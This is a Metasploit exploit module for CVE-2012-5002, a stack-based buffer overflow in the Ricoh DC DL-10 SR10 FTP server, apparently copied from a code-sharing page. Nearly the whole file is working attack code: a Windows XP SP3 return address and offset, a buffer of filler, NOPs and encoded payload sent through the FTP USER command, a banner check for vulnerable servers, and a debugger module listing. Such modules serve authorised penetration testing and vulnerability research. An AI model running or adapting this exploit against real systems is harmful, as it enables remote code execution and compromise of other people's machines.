Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Ftp
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'           => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
14
      'Description'    => %q{
15
          This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
16
        service.  By supplying a long string of data to the USER command, it is
17
        possible to trigger a stack-based buffer overflow, which allows remote code
18
        execution under the context of the user.
19

20
          Please note that in order to trigger the vulnerability, the server must
21
        be configured with a log file name (by default, it's disabled).
22
      },
23
      'License'        => MSF_LICENSE,
24
      'Author'         =>
25
        [
26
          'Julien Ahrens', #Discovery, PoC
27
          'sinn3r'         #Metasploit
28
        ],
29
      'References'     =>
30
        [
31
          ['CVE', '2012-5002'],
32
          ['OSVDB', '79691'],
33
          ['URL', 'http://web.archive.org/web/20120514112629/http://secunia.com/advisories/47912/'],
34
          ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']
35
        ],
36
      'Payload'        =>
37
        {
38
          # Yup, no badchars
39
          'BadChars' => "\x00",
40
        },
41
      'DefaultOptions'  =>
42
        {
43
          'EXITFUNC' => "process",
44
        },
45
      'Platform'       => 'win',
46
      'Targets'        =>
47
        [
48
          [
49
            'Windows XP SP3',
50
            {
51
              'Ret'    => 0x77c35459,  #PUSH ESP; RETN (msvcrt.dll)
52
              'Offset' => 245
53
            }
54
          ]
55
        ],
56
      'Privileged'     => false,
57
      'DisclosureDate' => '2012-03-01',
58
      'DefaultTarget'  => 0))
59

60
    # We're triggering the bug via the USER command, no point to have user/pass
61
    # as configurable options.
62
    deregister_options('FTPPASS', 'FTPUSER')
63
  end
64

65
  def check
66
    connect
67
    disconnect
68
    if banner =~ /220 DSC ftpd 1\.0 FTP Server/
69
      return Exploit::CheckCode::Appears
70
    else
71
      return Exploit::CheckCode::Safe
72
    end
73
  end
74

75
  def exploit
76
    buf = ''
77
    buf << rand_text_alpha(target['Offset'], payload_badchars)
78
    buf << [target.ret].pack('V')
79
    buf << make_nops(20)
80
    buf << payload.encoded
81

82
    print_status("#{rhost}:#{rport} - Sending #{self.name}")
83
    connect
84
    send_user(buf)
85
    handler
86
    disconnect
87
  end
88
end
89

90
=begin
91
0:002> lmv m SR10
92
start    end        module name
93
00400000 00410000   SR10       (deferred)
94
    Image path: C:\Program Files\DC Software\SR10.exe
95
    Image name: SR10.exe
96
    Timestamp:        Mon May 19 23:55:32 2008 (483275E4)
97
    CheckSum:         00000000
98
    ImageSize:        00010000
99
    File version:     1.0.0.520
100
    Product version:  1.0.0.0
101
    File flags:       0 (Mask 3F)
102
    File OS:          4 Unknown Win32
103
    File type:        1.0 App
104
    File date:        00000000.00000000
105
    Translations:     0409.04b0
106
    CompanyName:      Ricoh Co.,Ltd.
107
    ProductName:      SR-10
108
    InternalName:     SR-10
109
    OriginalFilename: SR10.EXE
110
    ProductVersion:   1, 0, 0, 0
111
    FileVersion:      1, 0, 0, 520
112
    PrivateBuild:     1, 0, 0, 520
113
    SpecialBuild:     1, 0, 0, 520
114
    FileDescription:  SR-10
115

116

117
Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most
118
stable component we can use is msvcrt.dll for now.
119
=end
120

121

122